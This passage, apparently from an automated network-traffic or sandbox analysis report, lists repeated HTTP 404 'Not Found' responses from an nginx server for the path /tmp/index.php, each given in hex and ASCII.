      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:52 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:02:59 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:06 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:09 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:10 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:11 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 15:03:13 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
